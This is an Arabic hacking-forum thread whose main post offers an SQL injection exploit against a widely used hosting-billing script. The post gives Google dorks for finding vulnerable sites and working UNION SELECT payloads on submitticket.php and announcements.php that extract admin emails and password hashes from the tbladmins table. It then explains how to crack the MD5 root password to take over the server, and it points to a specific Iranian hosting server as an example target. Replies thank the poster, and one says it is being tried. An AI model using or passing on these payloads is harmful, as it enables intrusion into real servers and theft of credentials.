السلام عليكم ورحمة الله ... ! كيفكم ياشباب ان شاء الله بخير .. ! ثغرة خطيرة بسكربت معروف عند الكل لكن ثغراته كانت برايفت تقريبا عند مجموعة من الهكر وتم ترويت العديد من السيرفر خصوصا تحديث 2010 قبل صدور اللوكات الجديدة الثغرة بسكربت وهم whm هالسكربت يعتبر كـسيبنل للروت يتحكم من خلاله بالسيرفر باضافة حسابات جديدة وحذف وتعديل ووووو الخ الثغرة هي من نوع SQL وهذا دليل لقوة هالنوع من الثغرات ... الاصابة عالية ... والملفات المصابة تقريبا 3 اولا دورك الثغرة كود PHP: allinurl: "/submitticket.php" او كود PHP: allinurl: "/announcements.php" الاستغلال كود PHP: submitticket.php?step=2&deptid=001 and 1=0 union all select 1,2,3,4,user****,6,7,8,password,10 from tbladmins--%20 او كود PHP: announcements.php?id=1%27%20and%201=0%20union%20al l%20sElect%201,2,concat (email,0x3d,password),user****,5%20from%20tbladmin s--%20/ للمعلومية هالثغرة مثل ماقلت تستطيع ترويت السيرفر بدون لوكل وذلك لمجرد الحصول على باسوورد الروت الموجود في الكونفق مشفر بمقياس Md5 فك التشفير وادخل من البيوتي والى روت ...! مثال على استضافة وسيرفر ايراني هدية لكم كود PHP: l%20sElect%201,2,concat%28email,0x3d,password%29,u ser****,5%20from%20tbladmins--%20/ الكلمة المشفره n ame لوحة التحكم ملاحظة لاصحاب الاستضافات العربية لترقيع الثغرة وضع جدار ناري على اللوحة
لملم شتاااتك من حياتي ما راح يكفي دام عمري وخسرته بعدي في حبك ولاني قادر ابقا معك بعد يلي افيني عاملته [email protected] يكفيني قهر منك ربي يسامحك
مشكوووووور جاري التجربه
==================================================
الله يعطك العافيه على الطرح بتوفيق لك
اشهد ان لا اله الا الله وان محمد رسول الله http://www.aljyyosh.com/vb/showthread.php?t=25438 افضل موقع www.livequran.org
قوانين المنتدى